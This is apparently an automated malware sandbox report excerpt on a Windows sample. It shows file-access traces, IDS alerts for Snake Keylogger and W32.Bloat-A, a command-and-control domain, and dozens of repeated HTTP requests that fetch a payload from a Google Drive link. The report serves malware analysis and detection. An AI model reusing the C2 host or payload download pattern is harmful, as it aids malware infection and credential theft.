                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01001C7F lstrcpyA,lstrcpyA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcmpA,lstrcmpA,lstrcatA,lstrcatA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_01001C7F
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.7:49738 -> 69.42.215.252:80
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49731 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49750 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49749 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49742 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49761 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49783 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49730 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49805 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49796 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49806 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49840 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49816 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49831 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49782 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49815 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49797 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49832 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49760 -> 216.58.206.78:443
                          Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.7:49739 -> 216.58.206.78:443
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: xred.mooo.com
                          Uses dynamic DNS services
                          Source: unknownDNS query: name: freedns.afraid.org
                          Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z8ISdsaDgeQ-R92528VnVtLURB30Y38-aVS--eidvIefqkCEPr3CIShwBqvQNChxi78jJs_B6El_WOypI3n11rvYfqf5fJH8w9cnwSg4NbUzFQTFVkPa-k6AAbvGWHeJ6bZIGGecF_hCji0wmUDxwNYOPzmKmt0jaFEwuZae5k0dUpTZ8SV0SQRO
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z8ISdsaDgeQ-R92528VnVtLURB30Y38-aVS--eidvIefqkCEPr3CIShwBqvQNChxi78jJs_B6El_WOypI3n11rvYfqf5fJH8w9cnwSg4NbUzFQTFVkPa-k6AAbvGWHeJ6bZIGGecF_hCji0wmUDxwNYOPzmKmt0jaFEwuZae5k0dUpTZ8SV0SQRO
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GeAkmjbx9XzFNs4FFTRBp3iyJ_rRSIBOK5y196FKDF35PMipuw2aVwOKuIboxDPPASQuN-xbYZJkPpmtKazWJJ6TnCTLy4vwt9MEVuXzyph2RWF4j13r0KkdCxjiMzCLuTYbg-ZCUTdHoPAJjpCEwZFbPE4TT1r8RUGqNdikHEOX1FTNOdkVh2I
                          Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GeAkmjbx9XzFNs4FFTRBp3iyJ_rRSIBOK5y196FKDF35PMipuw2aVwOKuIboxDPPASQuN-xbYZJkPpmtKazWJJ6TnCTLy4vwt9MEVuXzyph2RWF4j13r0KkdCxjiMzCLuTYbg-ZCUTdHoPAJjpCEwZFbPE4TT1r8RUGqNdikHEOX1FTNOdkVh2I
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=GeAkmjbx9XzFNs4FFTRBp3iyJ_rRSIBOK5y196FKDF35PMipuw2aVwOKuIboxDPPASQuN-xbYZJkPpmtKazWJJ6TnCTLy4vwt9MEVuXzyph2RWF4j13r0KkdCxjiMzCLuTYbg-ZCUTdHoPAJjpCEwZFbPE4TT1r8RUGqNdikHEOX1FTNOdkVh2I
                          Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
